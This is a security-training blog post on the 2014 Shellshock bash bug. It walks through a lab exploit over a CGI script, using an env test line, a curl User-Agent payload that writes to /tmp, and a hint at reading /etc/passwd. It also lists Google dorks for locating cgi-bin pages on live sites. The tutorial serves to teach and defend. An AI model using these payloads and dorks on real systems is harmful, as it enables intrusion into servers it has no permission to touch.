SecurityTrainings

Shellshock- the Destroyer

Shellshock – the latest vulnerability that was disclosed on 24 September 2014. Shellshock is also known as BASH Bug or Bashdoor. Firstly the original bug discovered by Stéphane Chazelas on 12 September 2014 and suggested the name “bashdoor” to it. Common Vulnerabilities and Exposures (CVE) identifier assigned to it is CVE-2014-6271. This bug exploit worldwide within hours after its disclosure due to its simplicity, ease to exploitation and widely used base of BASH.

The various CVE identifier for related vulnerabilities is (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187).

CVE from NIST vulnerability database rate shellshock 10 on a scale of 10. Means highest for severity as bad as it get.

What is actually Shellshock Bug?

It is the vulnerability in GNU’s bash shell that allow attacker to execute remote command on vulnerable system. BASH is a free software developed by Chet Ramey, a professional software architect in 1992. Bash is an interpreter that use by system to run command or scripts/programs on Unix and Linux system, can be operate as parser for CGI running on apache or any other web server. It is default shell for LINUX and Mac OS and mostly installed on every LINUX system this is reason to exploit on many machines. Bash is also used for administrative function including configuring websites, update and many others. Bash can operate as command and as well as interpreter so it is possible to execute bash within itself.

Attacker craft an environment variable in such a way that after bash function its string or arbitrary code execute remotely. Environment variables are pair of some values or name possess by each running program. When one program start another program, it provides an initial list of environment variable for new program. Environment variables with values begin with parentheses (“()”) followed by function definition encoded while exporting into new program instance. The new instance of Bash, upon starting, scans its environment variable list for values and create a fragment of code from the value and executing it. Affected version do not verify that fragment is valid function definition. Therefore attacker can execute arbitrary command by executing bash by placing its code in environment list.

This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3.

1

 

Let’s do practical:

I exploit this bug using CGI (common gateway interface) vector. CGI is used for communication between client and web server. CGI stores information in system environment variables that can be accessed through the CGI scripts.

Requirement:

Two VM ware machine one will be server and other will be used as client.

I used backtrack 5 as server and Ubuntu as client.

Test of Vulnerability:

First ensure that your system should vulnerable and for this run this command.

env x= ‘() { :;}; echo vulnerable’ bash -c “echo this is a test”

If it will print “vulnerable” and “this is test” then our system is vulnerable to shellshock.

env

 

env2

 

Now time to attack:

In the backtrack machine (to make it server) go to cgi-bin directory and create a test1.cgi file.

cgi-bin is at location /usr/lib/cgi-bin/  and create test1.cgi and write the given code:

#!/bin/bash

echo “Content-type: text/plain”

echo

echo

echo “Hi”

cgif

Now restart the apache service and enter IP address with path in the browser of backtrack to check it is working or not.

$ service apache2 restart

172.x.x.x(IP)/cgi-bin/test1.cgi  (enter in brower)

If it print “Hi” in browser then go to next step other check internet setting or proxy if used. Also enter this path in Ubuntu (another os) and it will print same “Hi”. If not then add IP in /etc/hosts file (in server bt 5).

hi

 

Next Step(Remote Code Execution):

Use the curl utility to exploit the server. Write this command in client machine (Ubuntu). If it will execute successfully then we can create “cio” file in /tmp directory of server (backtrack 5).

sdon2

 

curl -k -H ‘User-Agent: () { :; }; echo cio > /tmp/cio’  http://servermachine_ip/cgi-bin/test1.cgi

hi2

 

As we get “hi”, it means server is reachable from client and crafted environment variable execute the bash function that create cio file in /tmp directory.

To verify go into server and in terminal use ‘ls /tmp/’ command if ‘cio’ present then we successfully exploited the bug.

cio

 

This is the simple command; we can place malware or create backdoor also. It is advisable to try on virtual machine only.

We can retrieve password from the directory /etc/passswd. Only need to change in bash command.

etcpass

 

To find the exact path of cgi-bin use google dorks. Some listed dorks are:

  • filetype:cgi inurl:cgi-bin
  • filetype:cgi inurl:cgi-bin
  • filetype:sh inurl:”server-status” intitle:apache “cgi-bin”
  • sitemap.xml filetype:xml intext:”cgi-bin” filetype:sh inurl:cgi-bin site:[your domain]
  • inurl:cgi-bin “GATEWAY_INTERFACE = CGI”
  • inurl:/cgi-sys/entropysearch.cgi
  • inurl:/cgi-sys/FormMail-clone.cgi

Other attacks like Reverse TCP shell and DDOS can also be performed by curl utility.

Prevention:

Upgrade the bash as soon as possible.

sudo apt-get update  –for linux

References:

Shellshock Wikipedia 

Shellshock Remote Code Execution

 

Similar posts
  • SecurityXploded 4th Quarterly Meetup ... Here is the quick update and presentations from our recently concluded Fourth ‘SecurityXploded Cyber Security Quarterly Meetup’.     In this meet, Subrat Sarkar delivered presentation on “Exposing the secrets of Windows Credential Provider”, Raghav Pande covered the topic on “Defeating Public Exploit Protections(EMET v5.2 and more)”, Amit Malik presented the topic “Return Address – [...]
  • SX 4th Meetup – Defeating publi... In this awesome presentation, Raghav Pande explained the concept of public protections and showed how public exploit mitigation toolkits are not enough to protect from a targeted attack as well as how easy it is to evade all public protections.   Presentation:   [...]
  • SX 4th Meetup – Exposing the se... In this awesome presentation, Subrat Sarkar explained the concepts of Windows logon mechanism, Windows Logon architecture, Windows credential provider and showed how an attacker can take advantage of credential provider to steal Windows password in plain text and how to find and mitigate this issue.   Presentation:   [...]
  • SX 4th Meetup -Return Address – The s... In this awesome presentation, Amit Malik discussed about the importance of return address in solving some of the problems related to analysis and detection of the malicious codes.   Presentation:       [...]
  • SecurityXploded Cyber Security Meetup... This is an announcement for the upcoming SecurityXploded cyber security community meetup on 23rd May 2015 in Bangalore, India. This meet is completely free and doesn’t require any registration or any other formalities to attend. The meet will start at 10 AM IST.   After the meet, we will upload the presentations/videos for our online [...]

Leave a Reply

Your email address will not be published. Required fields are marked *